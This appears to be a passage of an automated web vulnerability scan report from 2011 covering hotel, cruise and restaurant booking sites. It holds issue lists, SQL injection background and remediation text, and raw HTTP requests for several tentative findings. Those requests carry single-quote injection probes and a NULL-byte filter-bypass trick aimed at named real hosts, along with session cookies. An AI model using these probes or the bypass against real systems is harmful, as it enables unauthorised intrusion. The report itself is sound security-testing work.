20.264. http://www.rooms.com/lib/javascript/validation/validating.js

20.265. http://www.royalcaribbean.com/css/no_hp_screen.css

20.266. http://www.royalcaribbean.com/js/jquery.colorbox.js

20.267. http://www1.hilton.com/common/js/jquery/jquery-autocomplete.js

20.268. http://www1.hilton.com/common/js/jquery/jquery-dimensions.js

20.269. http://www1.hilton.com/common/js/jquery/jquery.bgiframe.js

20.270. http://www1.hilton.com/en_US/hi/customersupport/index.do

20.271. http://www1.hilton.com/en_US/hi/customersupport/site-usage.do

20.272. http://www2.ncl.com/about/contact-us

20.273. http://www2.ncl.com/about/environmental-commitment

20.274. http://www2.ncl.com/faq

20.275. http://www2.ncl.com/freestyle-cruise/bon-voyage-gifts

20.276. http://www2.ncl.com/freestyle-cruise/casinos-at-sea/overview

20.277. http://www2.ncl.com/freestyle-cruise/golf/overview

20.278. http://www2.ncl.com/sites/default/files/js/js_5d76dfa931b3f87cf982fc13b45dcea8.js

20.279. http://www2.ncl.com/sites/default/files/js/js_97f1d6eea35366a16399aa1c4828dd79.js

20.280. http://www2.ncl.com/sites/default/files/js/js_9cea7beabceed10f390c1bf7ee345b9c.js

20.281. http://www2.ncl.com/sites/default/files/js/js_d4e8bcb21875da0f05034d544fc4310d.js

20.282. http://www2.ncl.com/sites/default/files/js/js_fdd3c7be863ac5dd808fad0ba5949c4a.js

20.283. http://www3.hilton.com/en_US/hi/brand/popup/preExistingCertificate.htm

20.284. http://www3.hilton.com/skins/common/js_comp/r1core.comp.min.js

20.285. http://www3.hilton.com/skins/common/js_comp/tracking.comp.min.js

20.286. http://www3.hilton.com/skins/en_US/js_comp/search.comp.min.js

21. Private IP addresses disclosed

21.1. http://static.ak.connect.facebook.com/images/loaders/indicator_white_large.gif

21.2. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US

21.3. http://static.ak.facebook.com/connect.php/en_US/css/bookmark-button-css/connect-button-css/share-button-css/FB.Connect-css/connect-css

21.4. http://static.ak.facebook.com/connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML

21.5. http://static.ak.facebook.com/images/loaders/indicator_white_large.gif

21.6. http://static.ak.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US

21.7. http://www.connect.facebook.com/widgets/fan.php

21.8. http://www.connect.facebook.com/widgets/fan.php

21.9. http://www.connect.facebook.com/widgets/fan.php

21.10. http://www.cruises.com/promotion/balcony-suite-cruises.do

21.11. http://www.cruises.com/promotion/weekend-cruises.do

21.12. http://www.cruisesonly.com/promotion/bermuda-cruises.do

21.13. http://www.cruisesonly.com/sharedwidgets/Caribbean.do

21.14. http://www.facebook.com/extern/login_status.php

21.15. http://www.facebook.com/extern/login_status.php

21.16. http://www.facebook.com/plugins/like.php

21.17. http://www.facebook.com/plugins/like.php

21.18. http://www.facebook.com/plugins/like.php

21.19. http://www.facebook.com/plugins/like.php

21.20. http://www.facebook.com/plugins/like.php

21.21. http://www.facebook.com/plugins/like.php

21.22. http://www.facebook.com/plugins/like.php

21.23. http://www.facebook.com/plugins/like.php

21.24. http://www.facebook.com/plugins/like.php

21.25. http://www.facebook.com/plugins/like.php

21.26. http://www.facebook.com/plugins/like.php

21.27. http://www.facebook.com/plugins/like.php

21.28. http://www.facebook.com/plugins/like.php

21.29. http://www.facebook.com/plugins/like.php

21.30. http://www.facebook.com/plugins/like.php

21.31. http://www.facebook.com/plugins/like.php

21.32. http://www.facebook.com/plugins/like.php

21.33. http://www.facebook.com/plugins/like.php

21.34. http://www.facebook.com/plugins/like.php

21.35. http://www.facebook.com/plugins/likebox.php

21.36. http://www.facebook.com/plugins/likebox.php

21.37. http://www.facebook.com/widgets/fan.php

21.38. http://www.facebook.com/widgets/fan.php

21.39. http://www2.ncl.com/

21.40. http://www2.ncl.com/about/careers/overview

21.41. http://www2.ncl.com/about/contact-us

21.42. http://www2.ncl.com/about/environmental-commitment

21.43. http://www2.ncl.com/about/staying-connected-sea-internet-access

21.44. http://www2.ncl.com/cruise-destinations

21.45. http://www2.ncl.com/faq

21.46. http://www2.ncl.com/freestyle-cruise/bon-voyage-gifts

21.47. http://www2.ncl.com/freestyle-cruise/casinos-at-sea/overview

21.48. http://www2.ncl.com/freestyle-cruise/cruise-rewards

21.49. http://www2.ncl.com/freestyle-cruise/freestyle-accommodations

21.50. http://www2.ncl.com/freestyle-cruise/freestyle-dining

21.51. http://www2.ncl.com/freestyle-cruise/freestyle-family-fun/overview

21.52. http://www2.ncl.com/freestyle-cruise/golf/overview

21.53. http://www2.ncl.com/freestyle-cruise/hawaii-cruise-and-hotel-packages

21.54. http://www2.ncl.com/freestyle-cruise/nickelodeon

21.55. http://www2.ncl.com/freestyle-cruise/onboard-experience

21.56. http://www2.ncl.com/freestyle-cruise/overview

21.57. http://www2.ncl.com/freestyle-cruise/spa

21.58. http://www2.ncl.com/freestyle-cruise/spa-sports-and-fitness

21.59. http://www2.ncl.com/ncl_inside_scoop

21.60. http://www2.ncl.com/ncl_inside_scoop

21.61. http://www2.ncl.com/sitemap

21.62. https://www2.ncl.com/vacations

22. Robots.txt file

22.1. http://as00.estara.com/as/InitiateCall2.jsp

22.2. http://cm.g.doubleclick.net/pixel

22.3. http://g-pixel.invitemedia.com/gmatcher

22.4. http://gs.instantservice.com/geoipAPI.js

22.5. http://marriottinternationa.tt.omtrdc.net/m2/marriottinternationa/mbox/standard

22.6. http://metrics.marriott.com/b/ss/marriottglobal/1/H.20.2/s41431111721321

22.7. http://o.opentable.com/b/ss/otrestref/1/H.22.1/s45203784920740

22.8. http://opentable.tt.omtrdc.net/m2/opentable/mbox/standard

22.9. http://opentable.ugc.bazaarvoice.com/static/0938/r_5_ispacer.gif

22.10. http://reviews.opentable.com/0938/200/reviews.htm

22.11. http://rs.instantservice.com/resources/smartbutton/7534/II3_Servers.js

22.12. https://secure.hilton.com/en/hi/mytravelplanner/my_account.jhtml

22.13. https://secure2.hilton.com/en_US/hi/reservation/book.htm

22.14. https://secure3.hilton.com/en_US/hi/reservation/book.htm

22.15. http://tag.yieldoptimizer.com/ps/ps

22.16. http://www.hilton.com/en/hi/promotions/hi_resorts/index.jhtml

22.17. http://www.marriott.com/default.mi

22.18. http://www.marriottvacationclub.com/index.shtml

22.19. http://www.opentable.com/frontdoor/default.aspx

22.20. https://www2.ncl.com/vacations

22.21. https://www201.americanexpress.com/cards/Applyfservlet

22.22. http://www3.hilton.com/en_US/hi/search/findhotels/passiveSearch.htm

23. Cacheable HTTPS response

23.1. https://secure2.hilton.com/en_US/hi/reservation/book.htm

23.2. https://secure2.hilton.com/favicon.ico

23.3. https://www.cruisesonly.com/bcss/default.asp

23.4. https://www.cruisesonly.com/lib/javascript/display/iphone_js.asp

23.5. https://www.marriott.com/!crd_prm!.!cm

23.6. https://www.marriott.com/default.mi

23.7. https://www.marriottregistry.com/

23.8. https://www.ncl.com/nclweb/common/TealeafTarget.jsp

23.9. https://www.ncl.com/nclweb/secure/bookedGuestLanding.html

23.10. https://www.ncl.com/nclweb/secure/loginBookedGuest.html

23.11. https://www2.ncl.com/files/json/promo.json

23.12. https://www2.ncl.com/files/json/query_all.json

24. HTML does not specify charset

24.1. http://b3.mookie1.com/2/B3DM/DLX/1@x92

24.2. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1009225881@x96

24.3. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1090617097@x96

24.4. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1154839602@x96

24.5. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1413416439@x96

24.6. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1795641562@x96

24.7. http://b3.mookie1.com/2/TRACK_Royalcaribbean/RC_Retargeting2_SX_Nonsecure@Bottom3

24.8. http://b3.mookie1.com/2/TRACK_Royalcaribbean/SiteOpt_CONV_SX_Secure@Bottom3

24.9. http://b3.mookie1.com/2/royalcaribbean.com/beforeyouboard/home.do/2932448897@x95

24.10. http://b3.mookie1.com/2/royalcaribbean.com/dealsandmore/hotdeals.do/0246060285@x95

24.11. http://b3.mookie1.com/2/royalcaribbean.com/home.do/6905219797@x95

24.12. http://b3.mookie1.com/2/royalcaribbean.com/search/processSearch.do/4350521243@x95

24.13. http://b3.mookie1.com/2/royalcaribbean.com/search/processSearch.do/9110333970@x95

24.14. http://fls.doubleclick.net/activityi

24.15. http://hiltonworldwide.hilton.com/en/ww/ourbestrates/claimform.jhtml

24.16. https://secure.hilton.com/en/hi/login/login.jhtml

24.17. http://www.celebritycruises.com/html/en_US/plan-and-book/plan-your-cruise/result-markup.html

24.18. http://www.cruises.com/ajaxhtml/filterdynamic.do

24.19. http://www.cruises.com/code/webdata/webdataregister.asp

24.20. http://www.cruises.com/i/shadow.png

24.21. http://www.cruises.com/idle.do

24.22. http://www.cruisesonly.com/ajaxhtml/filterdynamic.do

24.23. http://www.cruisesonly.com/code/webdata/webdataregister.asp

24.24. http://www.cruisesonly.com/groupcruises/email/email_popup.asp

24.25. http://www.cruisesonly.com/includes/search_ads.css

24.26. http://www.cruisesonly.com/includes/stylesheet_test.css

24.27. http://www.cruisesonly.com/lib/javascript/ajax/logerror.js

24.28. http://www.hilton.com/en/hi/brand/about.jhtml

24.29. http://www.hilton.com/en/hi/info/site_usage.jhtml

24.30. http://www.hilton.com/en/hi/promotions/hi_resorts/index.jhtml

24.31. http://www.rooms.com/includes/sidebars/ob-search-collateral/PopupCalendar.html

25. Content type incorrectly stated

25.1. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1009225881@x96

25.2. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1090617097@x96

25.3. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1154839602@x96

25.4. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1413416439@x96

25.5. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1795641562@x96

25.6. http://gs.instantservice.com/geoipAPI.js

25.7. http://ipinvite.iperceptions.com/Invitations/Javascripts/ip_Layer_Invitation_850.aspx

25.8. http://oasc18005.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.opentable.opt/home/L22/1338891380/x22/RGM/OPT_1x1.jpg_950x35/1x1-4.jpg/4d686437616b356934616b41434d6658

25.9. http://oasc18005.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.opentable.opt/home/L22/92427839/Position1/RGM/OPT_1x1.jpg_980x65/1x1-5.jpg/4d686437616b356934616b41434d6658

25.10. http://opentable.tt.omtrdc.net/m2/opentable/mbox/standard

25.11. https://secure.hilton.com/en/hhonors/css/basic.css

25.12. http://vacations.rooms.com/caux/html/tracking.js

25.13. http://vdassets.bitgravity.com/embeds/videos/54834a058f00d/2adf12c322cf26d8daa82578343bfb02-ncl_default_hq.json

25.14. http://www.celebritycruises.com/fonts/booking/helveticaneueltstd-bd-webfont.woff

25.15. http://www.celebritycruises.com/fonts/booking/helveticaneueltstd-lt-webfont.woff

25.16. http://www.celebritycruises.com/fonts/booking/helveticaneueltstd-roman-webfont.woff

25.17. http://www.celebritycruises.com/fonts/booking/helveticaneueltstd-th-webfont.woff

25.18. http://www.celebritycruises.com/fonts/helveticaneueltstd-bd-webfont.woff

25.19. http://www.celebritycruises.com/fonts/helveticaneueltstd-lt-webfont.woff

25.20. http://www.celebritycruises.com/fonts/helveticaneueltstd-roman-webfont.woff

25.21. http://www.celebritycruises.com/fonts/helveticaneueltstd-th-webfont.woff

25.22. http://www.celebritycruises.com/search/loadSearchJSON.do

25.23. http://www.cruises.com/code/webdata/webdataregister.asp

25.24. http://www.cruises.com/idle.do

25.25. http://www.cruises.com/images_unique/cs/CS_CHATbanner_w.jpg

25.26. http://www.cruises.com/images_unique/cs/CS_FAQbanner_w.jpg

25.27. http://www.cruises.com/images_unique/cs/CS_HeadlineBanner_w.jpg

25.28. http://www.cruisesonly.com/code/webdata/webdataregister.asp

25.29. http://www.facebook.com/extern/login_status.php

25.30. http://www.marriott.com/!crd_prm!.!cm

25.31. https://www.marriott.com/!crd_prm!.!cm

25.32. http://www.ncl.com/nclweb/common/query_all.json

25.33. http://www.opentable.com/httphandlers/MetroData.aspx

25.34. http://www.orbitz.com/hotelimages/346/12346/Wellington-Hotel-Guest-Room-10.jpg

25.35. http://www1.hilton.com/brand/hi/media/images/buttons/button_pushtotalk.gif

25.36. http://www1.hilton.com/common/media/images/misc/icon_arrow_gray.gif

25.37. http://www1.hilton.com/common/media/images/misc/photogallery_thumbnails_background.gif

25.38. http://www1.hilton.com/en_US/common/media/images/headers/header_talktousnow.gif

25.39. http://www1.hilton.com/en_US/hi/media/images/buttons/button_sendform.gif

25.40. http://www1.hilton.com/favicon_hi.ico

25.41. http://www2.ncl.com/files/json/promo.json

25.42. http://www2.ncl.com/files/json/query_all.json

25.43. https://www2.ncl.com/files/json/promo.json

25.44. https://www2.ncl.com/files/json/query_all.json

26. Content type is not specified


1. SQL injection  next
There are 8 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

1.1. http://metrics.marriott.com/b/ss/marriottglobal/1/H.20.2/s45922061523888 [REST URL parameter 2]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://metrics.marriott.com
Path:   /b/ss/marriottglobal/1/H.20.2/s45922061523888

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss%00'/marriottglobal/1/H.20.2/s45922061523888?AQB=1&ndh=1&t=3/9/2011%207%3A56%3A0%201%20300&vmt=4E57E5D3&vmf=marriottinternational.122.2o7.net&ce=UTF-8&cdp=2&pageName=www.marriott.com/search/findHotels.mi&g=http%3A//www.marriott.com/search/findHotels.mi&r=http%3A//www.marriott.com/default.mi&c1=Reservation%20Process%20Step%201%20%28Citywide%29%3A%20Submitted%20Citywide%20Hotel%20Search&c2=Reservation%20Process%20Step%201%3A%20Submitted%20Hotel%20Search&v2=No%20Dates%20Entered&c5=US&c8=Weekday%20%3A%20Monday%20%3A%208%3A30AM&v11=InCity%3AwithoutDates&v12=bos%3Ama%3Aus&v13=all&c15=1&v15=Weekday%20%3A%20Monday%20%3A%208%3A30AM&c23=50&v35=First%20Visit&v41=US&c49=79%3AD%3AV%3ABOSLA%3A1.7%3A%3ABOSWF%3A2.1%3A%3ABOSLW%3A2.4%3A%3ABOSCH%3A2.5%3A%3ABOSTW%3A2.9%3A%3ABOSRT%3A3.1%3A%3ABOSDM%3A3.3%3A%3ABOSSO%3A3.9%3A%3ABOSCO%3A3.9%3A%3ABOSDT%3A3.9%3A&tnt=32629%3A1%3A0%2C&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1074&bh=906&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BRemoting%20Viewer%3BNative%20Client%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.marriott.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.marriott.com/search/findHotels.mi
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D859050118C6-4000010AC02572EF[CE]; mbox=check#true#1317646617|session#1317646533235-184575#1317648417|PC#1317646533235-184575.19#1318856157; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B; s_pers=%20s_lv%3D1317646560257%7C1412254560257%3B%20s_lv_s%3DFirst%2520Visit%7C1317648360257%3B

Response 1

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 13:01:10 GMT
Server: Omniture DC/2.0.0
Content-Length: 402
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss%00''/marriottglobal/1/H.20.2/s45922061523888?AQB=1&ndh=1&t=3/9/2011%207%3A56%3A0%201%20300&vmt=4E57E5D3&vmf=marriottinternational.122.2o7.net&ce=UTF-8&cdp=2&pageName=www.marriott.com/search/findHotels.mi&g=http%3A//www.marriott.com/search/findHotels.mi&r=http%3A//www.marriott.com/default.mi&c1=Reservation%20Process%20Step%201%20%28Citywide%29%3A%20Submitted%20Citywide%20Hotel%20Search&c2=Reservation%20Process%20Step%201%3A%20Submitted%20Hotel%20Search&v2=No%20Dates%20Entered&c5=US&c8=Weekday%20%3A%20Monday%20%3A%208%3A30AM&v11=InCity%3AwithoutDates&v12=bos%3Ama%3Aus&v13=all&c15=1&v15=Weekday%20%3A%20Monday%20%3A%208%3A30AM&c23=50&v35=First%20Visit&v41=US&c49=79%3AD%3AV%3ABOSLA%3A1.7%3A%3ABOSWF%3A2.1%3A%3ABOSLW%3A2.4%3A%3ABOSCH%3A2.5%3A%3ABOSTW%3A2.9%3A%3ABOSRT%3A3.1%3A%3ABOSDM%3A3.3%3A%3ABOSSO%3A3.9%3A%3ABOSCO%3A3.9%3A%3ABOSDT%3A3.9%3A&tnt=32629%3A1%3A0%2C&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1074&bh=906&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BRemoting%20Viewer%3BNative%20Client%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.marriott.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.marriott.com/search/findHotels.mi
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D859050118C6-4000010AC02572EF[CE]; mbox=check#true#1317646617|session#1317646533235-184575#1317648417|PC#1317646533235-184575.19#1318856157; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B; s_pers=%20s_lv%3D1317646560257%7C1412254560257%3B%20s_lv_s%3DFirst%2520Visit%7C1317648360257%3B

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 13:01:09 GMT
Server: Omniture DC/2.0.0
xserver: www86
Content-Length: 0
Content-Type: text/html

1.2. http://o.opentable.com/b/ss/otcom/1/H.22.1--NS/0 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://o.opentable.com
Path:   /b/ss/otcom/1/H.22.1--NS/0

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/otcom/1/H.22.1--NS%00'/0?AQB=1&pccr=true&vidn=2744D8A0051597FB-40000176E00002C7&g=none&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: o.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response 1

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 12:58:58 GMT
Server: Omniture DC/2.0.0
Content-Length: 416
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/otcom/1/H.22.1--NS was not found on this server
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/otcom/1/H.22.1--NS%00''/0?AQB=1&pccr=true&vidn=2744D8A0051597FB-40000176E00002C7&g=none&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: o.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 12:58:57 GMT
Server: Omniture DC/2.0.0
xserver: www648
Content-Length: 0
Content-Type: text/html

1.3. http://o.opentable.com/b/ss/otrestref/1/H.22.1/s41395109691657 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://o.opentable.com
Path:   /b/ss/otrestref/1/H.22.1/s41395109691657

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/otrestref/1%00'/H.22.1/s41395109691657?AQB=1&ndh=1&t=3%2F9%2F2011%207%3A57%3A4%201%20300&ce=UTF-8&pageName=500error&g=http%3A%2F%2Fwww.opentable.com%2Fjaspers-corner-tap-and-kitchen'%3Frid%3D200%26restref%3D200&r=http%3A%2F%2Fburp%2Fshow%2F2&cc=USD&ch=metrounspecified&c1=metrounspecified%3Aerror&v1=metrounspecified%3Aerror&c2=metrounspecified%3Aerror&v2=metrounspecified%3Aerror&c7=Logged%20Out&c9=500error&c12=New&v12=New&c13=500error&c17=4%3A30AM&v17=4%3A30AM&c18=Monday&v18=Monday&c19=Weekday&v19=Weekday&v36=anonymous&c38=500error&v43=500error&v50=500error&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1074&bh=906&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava(TM)%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BRemoting%20Viewer%3BNative%20Client%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: o.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/jaspers-corner-tap-and-kitchen'?rid=200&restref=200
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; jslt=DhNUH7QEwV3Jv9lH5b7HaYn50h4yr3sP; s_sq=%5B%5BB%5D%5D; restrefwhite=200; ftc=x=10%2f03%2f2011+15%3a55%3a22&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153"&p1=117&rr1=200&rr2=200; pgseq="; s_cc=true; s_nr=1317646624233-New

Response 1

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 13:05:32 GMT
Server: Omniture DC/2.0.0
Content-Length: 409
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/otrestref/1 was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/otrestref/1%00''/H.22.1/s41395109691657?AQB=1&ndh=1&t=3%2F9%2F2011%207%3A57%3A4%201%20300&ce=UTF-8&pageName=500error&g=http%3A%2F%2Fwww.opentable.com%2Fjaspers-corner-tap-and-kitchen'%3Frid%3D200%26restref%3D200&r=http%3A%2F%2Fburp%2Fshow%2F2&cc=USD&ch=metrounspecified&c1=metrounspecified%3Aerror&v1=metrounspecified%3Aerror&c2=metrounspecified%3Aerror&v2=metrounspecified%3Aerror&c7=Logged%20Out&c9=500error&c12=New&v12=New&c13=500error&c17=4%3A30AM&v17=4%3A30AM&c18=Monday&v18=Monday&c19=Weekday&v19=Weekday&v36=anonymous&c38=500error&v43=500error&v50=500error&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1074&bh=906&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava(TM)%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BRemoting%20Viewer%3BNative%20Client%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: o.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/jaspers-corner-tap-and-kitchen'?rid=200&restref=200
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
